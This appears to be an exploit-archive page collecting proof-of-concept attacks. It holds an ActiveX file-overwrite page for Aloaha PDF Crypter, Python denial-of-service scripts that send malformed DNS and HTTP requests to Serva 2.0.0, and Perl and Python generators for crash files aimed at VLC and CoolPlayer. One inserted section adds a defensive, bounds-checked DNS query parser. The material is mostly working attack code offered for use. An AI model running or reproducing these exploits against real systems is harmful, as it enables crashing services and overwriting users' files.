Archive for Dos/Poc

Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite

============================================================================================
TITLE:
============================================================================================
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
 
url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip
author: shinnai (http://shinnai.altervista.org)
============================================================================================
FILE INFO:
============================================================================================
File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
ACTIVEX INFO:
============================================================================================
ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class
Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
============================================================================================
BUG:
============================================================================================
This ActiveX control contains the "SaveToFile" method, which could be used to overwrite
arbitrary files on users' PCs.
============================================================================================
PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================

Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability

#!/usr/bin/python
 
# Exploit Title: Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed QueryName causes the crash
# Howto:         -
 
import socket
 
target="192.168.0.1"
port=53
 
TransACTID="\x03\xc3"
Flags="\x01\x00"
QuestionRRC="\x00\x01"
AnswerRRC="\x00\x00"
AuthRRC="\x00\x00"
AddRRC="\x00\x00"
QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00" #vulnerable: first length-byte
QueryType="\x00\x01"
QueryClass="\x00\x01"
payload = TransACTID + Flags + QuestionRRC + AnswerRRC +  AuthRRC + AddRRC + QueryName + QueryType + QueryClass
 
print "[*] Connecting to Target " + target + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0) #udp
 
print "[*] Sending malformed request..."
 
s.sendto(payload,(target,port))
 
print "[!] Exploit has been sent!\n"
s.close()
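
The script above marks the first length byte of QueryName as the trigger. As an added example (not part of the original advisory and not Serva's code), the following bounds-checked parser for the question section, following RFC 1035, shows how a server can reject that datagram instead of reading outside it; `read_qname`, `parse_question` and `MalformedQuery` are names chosen here, and the sample packets are constructed from the header fields shown above.

```python
import struct

MAX_NAME = 255  # RFC 1035 limit for an encoded name, terminator included

class MalformedQuery(ValueError):
    """Raised instead of reading outside the datagram."""

def read_qname(packet, offset):
    """Decode the name at offset; return (labels, offset after the name)."""
    labels, total, resume = [], 0, None
    while True:
        if offset >= len(packet):
            raise MalformedQuery("name runs past end of packet")
        length = packet[offset]
        if length & 0xC0 == 0xC0:  # compression pointer (0xFF lands here)
            if offset + 1 >= len(packet):
                raise MalformedQuery("truncated compression pointer")
            target = ((length & 0x3F) << 8) | packet[offset + 1]
            if target < 12 or target >= offset:
                raise MalformedQuery("pointer target %d is not earlier data" % target)
            resume = resume or offset + 2  # parsing continues after the first pointer
            offset = target
            continue
        if length & 0xC0:  # label types 0x40 and 0x80 are reserved
            raise MalformedQuery("reserved label type 0x%02x" % length)
        if length == 0:  # root label terminates the name
            return labels, (offset + 1 if resume is None else resume)
        if offset + 1 + length > len(packet):
            raise MalformedQuery("label overruns packet")
        total += 1 + length
        if total + 1 > MAX_NAME:
            raise MalformedQuery("name longer than 255 octets")
        labels.append(packet[offset + 1:offset + 1 + length])
        offset += 1 + length

def parse_question(packet):
    """Validate a single-question query; return (name, qtype, qclass)."""
    if len(packet) < 12 or packet[4:6] != b"\x00\x01":
        raise MalformedQuery("need a full header and exactly one question")
    labels, offset = read_qname(packet, 12)
    if offset + 4 > len(packet):
        raise MalformedQuery("missing QTYPE/QCLASS")
    qtype, qclass = struct.unpack("!HH", packet[offset:offset + 4])
    return b".".join(labels).decode("ascii", "replace"), qtype, qclass

# Constructed samples: header fields as in the script above.
HEADER = b"\x03\xc3\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
GOOD = HEADER + b"\x07inshell\x03net\x00" + b"\x00\x01\x00\x01"
BAD = HEADER + b"\xffinshell\x03net\x00" + b"\x00\x01\x00\x01"
```

`parse_question(GOOD)` returns the decoded name and types, while `parse_question(BAD)` raises `MalformedQuery` because 0xFF decodes as a compression pointer whose target lies beyond the datagram.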

Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability

#!/usr/bin/python
 
# Exploit Title: Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed GET Request causes the crash
# Howto:         -
 
import socket
import sys
 
target="192.168.0.21"
port=80
 
# 0000   47 45 54 20 20 2f 20 48 54 54 50 2f 31 2e 31 0d  GET  / HTTP/1.1.
# 0010   0a 48 6f 73 74 3a 20 68 74 74 70 3a 2f 2f 31 39  .Host: http://19
# 0020   32 2e 31 36 38 2e 30 2e 32 31 0d 0a 43 6f 6e 74  2.168.0.21..Cont
# 0030   65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d  ent-Length: 0...
# 0040   0a                                               .
 
payload = (
"\x47\x45\x54\x20\x20\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d"+
"\x0a\x48\x6f\x73\x74\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x39"+
"\x32\x2e\x31\x36\x38\x2e\x30\x2e\x32\x31\x0d\x0a\x43\x6f\x6e\x74"+
"\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x30\x0d\x0a\x0d"+
"\x0a"
)
 
print "[*] Connecting to Target " + target + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #tcp
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)
 
print "[*] Sending malformed request..."
 
s.send(payload)
 
print "[!] Exploit has been sent!\n"
s.close()

VLC media player 2.0.3 Twoflower (.ape) Crash PoC

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#     _                   __           __       __                     #
#   /' \            __  /'__`\        /\ \__  /'__`\                   #
#  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           #
#  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          #
#     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           #
#      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           #
#       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           #
#                  \ \____/ >> Exploit database separated by exploit   #
#                   \/___/          type (local, remote, DoS, etc.)    #
#                                                                      #
#  [+] Site            : 1337day.com                                   #
#  [+] Support e-mail  : submit[at]1337day.com                         #
#                                                                      #
#               #########################################              #
#               I'm The Black Devils member from Inj3ct0r Team         #
#               #########################################              #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
 
# Title : VLC media player 2.0.3 Twoflower (.ape) Crash Poc
# Date: 2012-01-09
# Software Link: http://www.videolan.org/vlc/
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz
 
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";                 
print "    |=======================================================|\n";
print "    |= [!] Name : VLC 2.0.3  || .APE File                  =|\n";
print "    |= [!] Exploit : Crash  Exploit                        =|\n";
print "    |= [!] Author  : The Black Devils                      =|\n";
print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
print "    |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
# Fail at open() if the file cannot be created, then write the header bytes
open(my $fh, ">", "Dz.ape") or die "\n [-] OupsS! File is Not Created !! ";
print $fh $PoC;
close($fh);
print "\n [+] File successfully created!\n";
 
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

CoolPlayerPlusPortable 2.19.4 (m3u) crash poc

# Title : CoolPlayerPlusPortable 2.19.4 (m3u) crash poc 
# Date: 2013-01-10
# Software http://coolplayer.sourceforge.net/
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / All DZ Hackerz
 
#!/usr/bin/python
 
file="Dz.m3u"
crash="\x41" * 100
try:
    print "[*] Creating exploit file...\n"
    writeFile = open (file, "w")
    writeFile.write(crash)
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[*] Error while creating file!"
 
 